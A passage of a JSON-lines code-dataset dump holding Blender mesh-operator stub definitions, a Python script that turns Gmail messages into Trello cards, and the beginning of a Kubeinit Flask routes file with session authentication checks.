calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_torus_add(align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0),\n major_segments: int = 48,\n minor_segments: int = 12,\n mode: typing.Union[int, str] = 'MAJOR_MINOR',\n major_radius: float = 1.0,\n minor_radius: float = 0.25,\n abso_major_rad: float = 1.25,\n abso_minor_rad: float = 0.75,\n generate_uvs: bool = True):\n '''Construct a torus mesh \n\n :param align: AlignWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location \n :type location: float\n :param rotation: Rotation \n :type rotation: float\n :param major_segments: Major Segments, Number of segments for the main ring of the torus \n :type major_segments: int\n :param minor_segments: Minor Segments, Number of segments for the minor ring of the torus \n :type minor_segments: int\n :param mode: Torus DimensionsMAJOR_MINOR Major/Minor, Use the major/minor radii for torus dimensions.EXT_INT Exterior/Interior, Use the exterior/interior radii for torus dimensions. \n :type mode: typing.Union[int, str]\n :param major_radius: Major Radius, Radius from the origin to the center of the cross sections \n :type major_radius: float\n :param minor_radius: Minor Radius, Radius of the torus’ cross section \n :type minor_radius: float\n :param abso_major_rad: Exterior Radius, Total Exterior Radius of the torus \n :type abso_major_rad: float\n :param abso_minor_rad: Interior Radius, Total Interior Radius of the torus \n :type abso_minor_rad: float\n :param generate_uvs: Generate UVs, Generate a default UV map \n :type generate_uvs: bool\n '''\n\n pass\n\n\ndef primitive_uv_sphere_add(segments: int = 32,\n ring_count: int = 16,\n radius: float = 1.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a UV sphere mesh \n\n :param segments: Segments \n :type segments: int\n :param ring_count: Rings \n :type ring_count: int\n :param radius: Radius \n :type radius: float\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef quads_convert_to_tris(quad_method: typing.Union[int, str] = 'BEAUTY',\n ngon_method: typing.Union[int, str] = 'BEAUTY'):\n '''Triangulate selected faces \n\n :param quad_method: Quad Method, Method for splitting the quads into trianglesBEAUTY Beauty , Split the quads in nice triangles, slower method.FIXED Fixed, Split the quads on the first and third vertices.FIXED_ALTERNATE Fixed Alternate, Split the quads on the 2nd and 4th vertices.SHORTEST_DIAGONAL Shortest Diagonal, Split the quads based on the distance between the vertices. \n :type quad_method: typing.Union[int, str]\n :param ngon_method: Polygon Method, Method for splitting the polygons into trianglesBEAUTY Beauty, Arrange the new triangles evenly (slow).CLIP Clip, Split the polygons with an ear clipping algorithm. \n :type ngon_method: typing.Union[int, str]\n '''\n\n pass\n\n\ndef region_to_loop():\n '''Select boundary edges around the selected faces \n\n '''\n\n pass\n\n\ndef remove_doubles(threshold: float = 0.0001, use_unselected: bool = False):\n '''Merge vertices based on their proximity \n\n :param threshold: Merge Distance, Maximum distance between elements to merge \n :type threshold: float\n :param use_unselected: Unselected, Merge selected to other unselected vertices \n :type use_unselected: bool\n '''\n\n pass\n\n\ndef reveal(select: bool = True):\n '''Reveal all hidden vertices, edges and faces \n\n :param select: Select \n :type select: bool\n '''\n\n pass\n\n\ndef rip(mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False,\n use_fill: bool = False):\n '''Disconnect vertex or edges from connected geometry \n\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. \n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n :param use_fill: Fill, Fill the ripped region \n :type use_fill: bool\n '''\n\n pass\n\n\ndef rip_edge(mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False):\n '''Extend vertices along the edge closest to the cursor \n\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. \n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n '''\n\n pass\n\n\ndef rip_edge_move(MESH_OT_rip_edge=None, TRANSFORM_OT_translate=None):\n '''Extend vertices and move the result \n\n :param MESH_OT_rip_edge: Extend Vertices, Extend vertices along the edge closest to the cursor \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef rip_move(MESH_OT_rip=None, TRANSFORM_OT_translate=None):\n '''Rip polygons and move the result \n\n :param MESH_OT_rip: Rip, Disconnect vertex or edges from connected geometry \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef screw(steps: int = 9,\n turns: int = 1,\n center: float = (0.0, 0.0, 0.0),\n axis: float = (0.0, 0.0, 0.0)):\n '''Extrude selected vertices in screw-shaped rotation around the cursor in indicated viewport \n\n :param steps: Steps, Steps \n :type steps: int\n :param turns: Turns, Turns \n :type turns: int\n :param center: Center, Center in global view space \n :type center: float\n :param axis: Axis, Axis in global view space \n :type axis: float\n '''\n\n pass\n\n\ndef select_all(action: typing.Union[int, str] = 'TOGGLE'):\n '''(De)select all vertices, edges or faces \n\n :param action: Action, Selection action to executeTOGGLE Toggle, Toggle selection for all elements.SELECT Select, Select all elements.DESELECT Deselect, Deselect all elements.INVERT Invert, Invert selection of all elements. \n :type action: typing.Union[int, str]\n '''\n\n pass\n\n\ndef select_axis(orientation: typing.Union[int, str] = 'LOCAL',\n sign: typing.Union[int, str] = 'POS',\n axis: typing.Union[int, str] = 'X',\n threshold: float = 0.0001):\n '''Select all data in the mesh on a single axis \n\n :param orientation: Axis Mode, Axis orientationGLOBAL Global, Align the transformation axes to world space.LOCAL Local, Align the transformation axes to the selected objects’ local space.NORMAL Normal, Align the transformation axes to average normal of selected elements (bone Y axis for pose mode).GIMBAL Gimbal, Align each axis to the Euler rotation axis as used for input.VIEW View, Align the transformation axes to the window.CURSOR Cursor, Align the transformation axes to the 3D cursor. \n :type orientation: typing.Union[int, str]\n :param sign: Axis Sign, Side to select \n :type sign: typing.Union[int, str]\n :param axis: Axis, Select the axis to compare each vertex on \n :type axis: typing.Union[int, str]\n :param threshold: Threshold \n :type threshold: float\n '''\n\n pass\n\n\ndef select_face_by_sides(number: int = 4,\n type: typing.Union[int, str] = 'EQUAL',\n extend: bool = True):\n '''Select vertices or faces by the number of polygon sides \n\n :param number: Number of Vertices \n :type number: int\n :param type: Type, Type of comparison to make \n :type type: typing.Union[int, str]\n :param extend: Extend, Extend the selection \n :type extend: bool\n '''\n\n pass\n\n\ndef select_interior_faces():\n '''Select faces where all edges have more than 2 face users \n\n '''\n\n pass\n\n\ndef select_less(use_face_step: bool = True):\n '''Deselect vertices, edges or faces at the boundary of each selection region \n\n :param use_face_step: Face Step, Connected faces (instead of edges) \n :type use_face_step: bool\n '''\n\n pass\n\n\ndef select_linked(delimit: typing.Set[typing.Union[int, str]] = {'SEAM'}):\n '''Select all vertices connected to the current selection \n\n :param delimit: Delimit, Delimit selected regionNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates. \n :type delimit: typing.Set[typing.Union[int, str]]\n '''\n\n pass\n\n\ndef select_linked_pick(deselect: bool = False,\n delimit: typing.Set[typing.Union[int, str]] = {'SEAM'},\n index=-1):\n '''(De)select all vertices linked to the edge under the mouse cursor \n\n :param deselect: Deselect \n :type deselect: bool\n :param delimit: Delimit, Delimit selected regionNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates. \n :type delimit: typing.Set[typing.Union[int, str]]\n '''\n\n pass\n\n\ndef select_loose(extend: bool = False):\n '''Select loose geometry based on the selection mode \n\n :param extend: Extend, Extend the selection \n :type extend: bool\n '''\n\n pass\n\n\ndef select_mirror(axis: typing.Set[typing.Union[int, str]] = {'X'},\n extend: bool = False):\n '''Select mesh items at mirrored locations \n\n :param axis: Axis \n :type axis: typing.Set[typing.Union[int, str]]\n :param extend: Extend, Extend the existing selection \n :type extend: bool\n '''\n\n pass\n\n\ndef select_mode(use_extend: bool = False,\n use_expand: bool = False,\n type: typing.Union[int, str] = 'VERT',\n action: typing.Union[int, str] = 'TOGGLE'):\n '''Change selection mode \n\n :param use_extend: Extend \n :type use_extend: bool\n :param use_expand: Expand \n :type use_expand: bool\n :param type: TypeVERT Vertex, Vertex selection mode.EDGE Edge, Edge selection mode.FACE Face, Face selection mode. \n :type type: typing.Union[int, str]\n :param action: Action, Selection action to executeDISABLE Disable, Disable selected markers.ENABLE Enable, Enable selected markers.TOGGLE Toggle, Toggle disabled flag for selected markers. \n :type action: typing.Union[int, str]\n '''\n\n pass\n\n\ndef select_more(use_face_step: bool = True):\n '''Select more vertices, edges or faces connected to initial selection \n\n :param use_face_step: Face Step, Connected faces (instead of edges) \n :type use_face_step: bool\n '''\n\n pass\n\n\ndef select_next_item():\n '''Select the next element (using selection order) \n\n '''\n\n pass\n\n\ndef select_non_manifold(extend: bool = True,\n use_wire: bool = True,\n use_boundary: bool = True,\n use_multi_face: bool = True,\n use_non_contiguous: bool = True,\n use_verts: bool = True):\n '''Select all non-manifold vertices or edges \n\n :param extend: Extend, Extend the selection \n :type extend: bool\n :param use_wire: Wire, Wire edges \n :type use_wire: bool\n :param use_boundary: Boundaries, Boundary edges \n :type use_boundary: bool\n :param use_multi_face: Multiple Faces, Edges shared by 3+ faces \n :type use_multi_face: bool\n :param use_non_contiguous: Non Contiguous, Edges between faces pointing in alternate directions \n :type use_non_contiguous: bool\n :param use_verts: Vertices, Vertices connecting multiple face regions \n :type use_verts: bool\n '''\n\n pass\n\n\ndef select_nth(skip: int = 1, nth: int = 1, offset: int = 0):\n '''Deselect every Nth element starting from the active vertex, edge or face \n\n :param skip: Deselected, Number of deselected elements in the repetitive sequence \n :type skip: int\n :param nth: Selected, Number of selected elements in the repetitive sequence \n :type nth: int\n :param offset: Offset, Offset from the starting point \n :type offset: int\n '''\n\n pass\n\n\ndef select_prev_item():\n '''Select the previous element (using selection order) \n\n '''\n\n pass\n\n\ndef select_random(percent: float = 50.0,\n seed: int = 0,\n action: typing.Union[int, str] = 'SELECT'):\n '''Randomly select vertices \n\n :param percent: Percent, Percentage of objects to select randomly \n :type percent: float\n :param seed: Random Seed, Seed for the random number generator \n :type seed: int\n :param action: Action, Selection action to executeSELECT Select, Select all elements.DESELECT Deselect, Deselect all elements. \n :type action: typing.Union[int, str]\n '''\n\n pass\n\n\ndef select_similar(type: typing.Union[int, str] = 'NORMAL',\n compare: typing.Union[int, str] = 'EQUAL',\n threshold: float = 0.0):\n '''Select similar vertices, edges or faces by property types \n\n :param type: Type \n :type type: typing.Union[int, str]\n :param compare: Compare \n :type compare: typing.Union[int, str]\n :param threshold: Threshold \n :type threshold: float\n '''\n\n pass\n\n\ndef select_similar_region():\n '''Select similar face regions to the current selection \n\n '''\n\n pass\n\n\ndef select_ungrouped(extend: bool = False):\n '''Select vertices without a group \n\n :param extend: Extend, Extend the selection \n :type extend: bool\n '''\n\n pass\n\n\ndef separate(type: typing.Union[int, str] = 'SELECTED'):\n '''Separate selected geometry into a new mesh \n\n :param type: Type \n :type type: typing.Union[int, str]\n '''\n\n pass\n\n\ndef set_normals_from_faces(keep_sharp: bool = False):\n '''Set the custom normals from the selected faces ones \n\n :param keep_sharp: Keep Sharp Edges, Do not set sharp edges to face \n :type keep_sharp: bool\n '''\n\n pass\n\n\ndef shape_propagate_to_all():\n '''Apply selected vertex locations to all other shape keys \n\n '''\n\n pass\n\n\ndef shortest_path_pick(edge_mode: typing.Union[int, str] = 'SELECT',\n use_face_step: bool = False,\n use_topology_distance: bool = False,\n use_fill: bool = False,\n skip: int = 0,\n nth: int = 1,\n offset: int = 0,\n index=-1):\n '''Select shortest path between two selections \n\n :param edge_mode: Edge Tag, The edge flag to tag when selecting the shortest path \n :type edge_mode: typing.Union[int, str]\n :param use_face_step: Face Stepping, Traverse connected faces (includes diagonals and edge-rings) \n :type use_face_step: bool\n :param use_topology_distance: Topology Distance, Find the minimum number of steps, ignoring spatial distance \n :type use_topology_distance: bool\n :param use_fill: Fill Region, Select all paths between the source/destination elements \n :type use_fill: bool\n :param skip: Deselected, Number of deselected elements in the repetitive sequence \n :type skip: int\n :param nth: Selected, Number of selected elements in the repetitive sequence \n :type nth: int\n :param offset: Offset, Offset from the starting point \n :type offset: int\n '''\n\n pass\n\n\ndef shortest_path_select(edge_mode: typing.Union[int, str] = 'SELECT',\n use_face_step: bool = False,\n use_topology_distance: bool = False,\n use_fill: bool = False,\n skip: int = 0,\n nth: int = 1,\n offset: int = 0):\n '''Selected shortest path between two vertices/edges/faces \n\n :param edge_mode: Edge Tag, The edge flag to tag when selecting the shortest path \n :type edge_mode: typing.Union[int, str]\n :param use_face_step: Face Stepping, Traverse connected faces (includes diagonals and edge-rings) \n :type use_face_step: bool\n :param use_topology_distance: Topology Distance, Find the minimum number of steps, ignoring spatial distance \n :type use_topology_distance: bool\n :param use_fill: Fill Region, Select all paths between the source/destination elements \n :type use_fill: bool\n :param skip: Deselected, Number of deselected elements in the repetitive sequence \n :type skip: int\n :param nth: Selected, Number of selected elements in the repetitive sequence \n :type nth: int\n :param offset: Offset, Offset from the starting point \n :type offset: int\n '''\n\n pass\n\n\ndef smoothen_normals(factor: float = 0.5):\n '''Smoothen custom normals based on adjacent vertex normals \n\n :param factor: Factor, Specifies weight of smooth vs original normal \n :type factor: float\n '''\n\n pass\n\n\ndef solidify(thickness: float = 0.01):\n '''Create a solid skin by extruding, compensating for sharp angles \n\n :param thickness: Thickness \n :type thickness: float\n '''\n\n pass\n\n\ndef sort_elements(type: typing.Union[int, str] = 'VIEW_ZAXIS',\n elements: typing.Set[typing.Union[int, str]] = {'VERT'},\n reverse: bool = False,\n seed: int = 0):\n '''The order of selected vertices/edges/faces is modified, based on a given method \n\n :param type: Type, Type of re-ordering operation to applyVIEW_ZAXIS View Z Axis, Sort selected elements from farthest to nearest one in current view.VIEW_XAXIS View X Axis, Sort selected elements from left to right one in current view.CURSOR_DISTANCE Cursor Distance, Sort selected elements from nearest to farthest from 3D cursor.MATERIAL Material, Sort selected elements from smallest to greatest material index (faces only!).SELECTED Selected, Move all selected elements in first places, preserving their relative order (WARNING: this will affect unselected elements’ indices as well!).RANDOMIZE Randomize, Randomize order of selected elements.REVERSE Reverse, Reverse current order of selected elements. \n :type type: typing.Union[int, str]\n :param elements: Elements, Which elements to affect (vertices, edges and/or faces) \n :type elements: typing.Set[typing.Union[int, str]]\n :param reverse: Reverse, Reverse the sorting effect \n :type reverse: bool\n :param seed: Seed, Seed for random-based operations \n :type seed: int\n '''\n\n pass\n\n\ndef spin(steps: int = 9,\n dupli: bool = False,\n angle: float = 1.5708,\n use_auto_merge: bool = True,\n use_normal_flip: bool = False,\n center: float = (0.0, 0.0, 0.0),\n axis: float = (0.0, 0.0, 0.0)):\n '''Extrude selected vertices in a circle around the cursor in indicated viewport \n\n :param steps: Steps, Steps \n :type steps: int\n :param dupli: Use Duplicates \n :type dupli: bool\n :param angle: Angle, Rotation for each step \n :type angle: float\n :param use_auto_merge: Auto Merge, Merge first/last when the angle is a full revolution \n :type use_auto_merge: bool\n :param use_normal_flip: Flip Normals \n :type use_normal_flip: bool\n :param center: Center, Center in global view space \n :type center: float\n :param axis: Axis, Axis in global view space \n :type axis: float\n '''\n\n pass\n\n\ndef split():\n '''Split off selected geometry from connected unselected geometry \n\n '''\n\n pass\n\n\ndef split_normals():\n '''Split custom normals of selected vertices \n\n '''\n\n pass\n\n\ndef subdivide(number_cuts: int = 1,\n smoothness: float = 0.0,\n ngon: bool = True,\n quadcorner: typing.Union[int, str] = 'STRAIGHT_CUT',\n fractal: float = 0.0,\n fractal_along_normal: float = 0.0,\n seed: int = 0):\n '''Subdivide selected edges \n\n :param number_cuts: Number of Cuts \n :type number_cuts: int\n :param smoothness: Smoothness, Smoothness factor \n :type smoothness: float\n :param ngon: Create N-Gons, When disabled, newly created faces are limited to 3-4 sided faces \n :type ngon: bool\n :param quadcorner: Quad Corner Type, How to subdivide quad corners (anything other than Straight Cut will prevent ngons) \n :type quadcorner: typing.Union[int, str]\n :param fractal: Fractal, Fractal randomness factor \n :type fractal: float\n :param fractal_along_normal: Along Normal, Apply fractal displacement along normal only \n :type fractal_along_normal: float\n :param seed: Random Seed, Seed for the random number generator \n :type seed: int\n '''\n\n pass\n\n\ndef subdivide_edgering(number_cuts: int = 10,\n interpolation: typing.Union[int, str] = 'PATH',\n smoothness: float = 1.0,\n profile_shape_factor: float = 0.0,\n profile_shape: typing.Union[int, str] = 'SMOOTH'):\n '''Subdivide perpendicular edges to the selected edge ring \n\n :param number_cuts: Number of Cuts \n :type number_cuts: int\n :param interpolation: Interpolation, Interpolation method \n :type interpolation: typing.Union[int, str]\n :param smoothness: Smoothness, Smoothness factor \n :type smoothness: float\n :param profile_shape_factor: Profile Factor, How much intermediary new edges are shrunk/expanded \n :type profile_shape_factor: float\n :param profile_shape: Profile Shape, Shape of the profileSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff. \n :type profile_shape: typing.Union[int, str]\n '''\n\n pass\n\n\ndef symmetrize(direction: typing.Union[int, str] = 'NEGATIVE_X',\n threshold: float = 0.0001):\n '''Enforce symmetry (both form and topological) across an axis \n\n :param direction: Direction, Which sides to copy from and to \n :type direction: typing.Union[int, str]\n :param threshold: Threshold, Limit for snap middle vertices to the axis center \n :type threshold: float\n '''\n\n pass\n\n\ndef symmetry_snap(direction: typing.Union[int, str] = 'NEGATIVE_X',\n threshold: float = 0.05,\n factor: float = 0.5,\n use_center: bool = True):\n '''Snap vertex pairs to their mirrored locations \n\n :param direction: Direction, Which sides to copy from and to \n :type direction: typing.Union[int, str]\n :param threshold: Threshold, Distance within which matching vertices are searched \n :type threshold: float\n :param factor: Factor, Mix factor of the locations of the vertices \n :type factor: float\n :param use_center: Center, Snap middle vertices to the axis center \n :type use_center: bool\n '''\n\n pass\n\n\ndef tris_convert_to_quads(face_threshold: float = 0.698132,\n shape_threshold: float = 0.698132,\n uvs: bool = False,\n vcols: bool = False,\n seam: bool = False,\n sharp: bool = False,\n materials: bool = False):\n '''Join triangles into quads \n\n :param face_threshold: Max Face Angle, Face angle limit \n :type face_threshold: float\n :param shape_threshold: Max Shape Angle, Shape angle limit \n :type shape_threshold: float\n :param uvs: Compare UVs \n :type uvs: bool\n :param vcols: Compare VCols \n :type vcols: bool\n :param seam: Compare Seam \n :type seam: bool\n :param sharp: Compare Sharp \n :type sharp: bool\n :param materials: Compare Materials \n :type materials: bool\n '''\n\n pass\n\n\ndef unsubdivide(iterations: int = 2):\n '''UnSubdivide selected edges & faces \n\n :param iterations: Iterations, Number of times to unsubdivide \n :type iterations: int\n '''\n\n pass\n\n\ndef uv_texture_add():\n '''Add UV Map \n\n '''\n\n pass\n\n\ndef uv_texture_remove():\n '''Remove UV Map \n\n '''\n\n pass\n\n\ndef uvs_reverse():\n '''Flip direction of UV coordinates inside faces \n\n '''\n\n pass\n\n\ndef uvs_rotate(use_ccw: bool = False):\n '''Rotate UV coordinates inside faces \n\n :param use_ccw: Counter Clockwise \n :type use_ccw: bool\n '''\n\n pass\n\n\ndef vert_connect():\n '''Connect selected vertices of faces, splitting the face \n\n '''\n\n pass\n\n\ndef vert_connect_concave():\n '''Make all faces convex \n\n '''\n\n pass\n\n\ndef vert_connect_nonplanar(angle_limit: float = 0.0872665):\n '''Split non-planar faces that exceed the angle threshold \n\n :param angle_limit: Max Angle, Angle limit \n :type angle_limit: float\n '''\n\n pass\n\n\ndef vert_connect_path():\n '''Connect vertices by their selection order, creating edges, splitting faces \n\n '''\n\n pass\n\n\ndef vertex_color_add():\n '''Add vertex color layer \n\n '''\n\n pass\n\n\ndef vertex_color_remove():\n '''Remove vertex color layer \n\n '''\n\n pass\n\n\ndef vertices_smooth(factor: float = 0.5,\n repeat: int = 1,\n xaxis: bool = True,\n yaxis: bool = True,\n zaxis: bool = True):\n '''Flatten angles of selected vertices \n\n :param factor: Smoothing, Smoothing factor \n :type factor: float\n :param repeat: Repeat, Number of times to smooth the mesh \n :type repeat: int\n :param xaxis: X-Axis, Smooth along the X axis \n :type xaxis: bool\n :param yaxis: Y-Axis, Smooth along the Y axis \n :type yaxis: bool\n :param zaxis: Z-Axis, Smooth along the Z axis \n :type zaxis: bool\n '''\n\n pass\n\n\ndef vertices_smooth_laplacian(repeat: int = 1,\n lambda_factor: float = 1.0,\n lambda_border: float = 5e-05,\n use_x: bool = True,\n use_y: bool = True,\n use_z: bool = True,\n preserve_volume: bool = True):\n '''Laplacian smooth of selected vertices \n\n :param repeat: Number of iterations to smooth the mesh \n :type repeat: int\n :param lambda_factor: Lambda factor \n :type lambda_factor: float\n :param lambda_border: Lambda factor in border \n :type lambda_border: float\n :param use_x: Smooth X Axis, Smooth object along X axis \n :type use_x: bool\n :param use_y: Smooth Y Axis, Smooth object along Y axis \n :type use_y: bool\n :param use_z: Smooth Z Axis, Smooth object along Z axis \n :type use_z: bool\n :param preserve_volume: Preserve Volume, Apply volume preservation after smooth \n :type preserve_volume: bool\n '''\n\n pass\n\n\ndef wireframe(use_boundary: bool = True,\n use_even_offset: bool = True,\n use_relative_offset: bool = False,\n use_replace: bool = True,\n thickness: float = 0.01,\n offset: float = 0.01,\n use_crease: bool = False,\n crease_weight: float = 0.01):\n '''Create a solid wire-frame from faces \n\n :param use_boundary: Boundary, Inset face boundaries \n :type use_boundary: bool\n :param use_even_offset: Offset Even, Scale the offset to give more even thickness \n :type use_even_offset: bool\n :param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry \n :type use_relative_offset: bool\n :param use_replace: Replace, Remove original faces \n :type use_replace: bool\n :param thickness: Thickness \n :type thickness: float\n :param offset: Offset \n :type offset: float\n :param use_crease: Crease, Crease hub edges for improved subsurf \n :type use_crease: bool\n :param crease_weight: Crease weight \n :type crease_weight: float\n '''\n\n pass\n"} {"ext": "py", "sha": "1a304933cb80e62027c2631ddc0202f5385045a8", "content": "from imbox import Imbox\nimport html2text\nimport requests\nimport json\nimport time\n\nwith open('config.json') as config_file:\n data = json.load(config_file)\n\nAPI_KEY = data['API_KEY']\nOAUTH_TOKEN = data['OAUTH_TOKEN']\ntrello_list_id = data['trello_list_id']\n\n# SSL Context docs https://docs.python.org/3/library/ssl.html#ssl.create_default_context\n\ndef get_text(content):\n html = (str(content))\n\n text_maker = html2text.HTML2Text()\n text_maker.ignore_links = True\n text_maker.bypass_tables = False\n \n\n text = text_maker.handle(html)\n\n # Slice everything that comes between html': and ]}\n start = \"html':\"\n end = \"]}\"\n mail_content = text[text.find(start) + len(start):text.rfind(end)]\n \n # Normalize content, removing unknown chars\n mail_content = mail_content.replace(\"['\",\"\")\n mail_content = mail_content.replace('\\\\xa0', ' ')\n mail_content = mail_content.replace(\"\\\\r\\\\n'\",\"\")\n \n return mail_content\n\n\ndef send_to_trello(mail_content,subject): \n \n r = requests.post(\"https://api.trello.com/1/cards?key=\" + \\\n API_KEY + \"&token=\" + OAUTH_TOKEN + \\\n \"&name=\" + subject + \"&idList=\" + \\\n trello_list_id + \"&desc=\" + \\\n mail_content)\n\n return r\n \nwith Imbox('imap.gmail.com',\n username = data['mail_username'],\n password = data['mail_password'],\n ssl = True,\n ssl_context = None,\n starttls = False) as imbox:\n\n fetch_mail_type = imbox.messages(sent_from = data['mail_from_username'])\n\n # Get all folders\n #status, folders_with_additional_info = imbox.folders()\n\n # Gets all messages from the inbox\n #all_inbox_messages = imbox.messages()\n\n for uid, message in fetch_mail_type:\n # Every message is an object with the following keys\n\n origin = message.sent_from\n receiver = message.sent_to\n subject = message.subject\n headers = message.headers\n message_id = message.message_id\n message_date = message.date\n content = message.body\n message_attachments = message.attachments\n\n result = get_text(content)\n response = send_to_trello(result,subject)\n \n if response.status_code == 200:\n #imbox.mark_seen(uid)\n imbox.delete(uid)\n\n\n time.sleep(1)"} {"ext": "py", "sha": "1a304b706f06264e84f92dd35e7e8243b8a98c9c", "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright 2019 Kubeinit (kubeinit.com).\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may\nnot use this file except in compliance with the License. You may obtain\na copy of the License at:\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\nWARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\nLicense for the specific language governing permissions and limitations\nunder the License.\n\"\"\"\n\nimport app\nfrom app import version as kubeinit_ui_version\nfrom app.base import blueprint\nfrom app.base.k8sclient import (cluster_name_configured,\n state_namespaces,\n state_nodes,\n state_pods,\n web_terminal)\n\nfrom flask import jsonify, redirect, render_template, request, url_for\n# , session\n\n# from flask_login import (current_user,\n# login_required,\n# login_user,\n# logout_user)\n\nfrom google.cloud import firestore\n\nfrom pystol.lister import list_actions, show_actions\n\nKUBEINIT_VERSION = kubeinit_ui_version.__version__\n\n#\n# Begin authentication\n#\ntry:\n from app.auth.routes import get_session_data\n# from app.auth.util import remote_cluster\nexcept ImportError:\n print(\"Module not available\")\n\ntry:\n fdb = firestore.Client()\n transaction = fdb.transaction()\nexcept Exception as e:\n print(\"Cant connect to firestore: %s\" % (e))\n#\n# End authentication\n#\n\n\n@blueprint.route('/error-')\ndef route_errors(error):\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return render_template('errors/{}.html'.format(error))\n\n\n# API endpoints\n@blueprint.route('/api/v1/ListActions', methods=['GET'])\ndef api_list_actions():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(list_actions())\n\n\n@blueprint.route('/api/v1/ShowActions', methods=['GET'])\ndef api_show_actions():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the 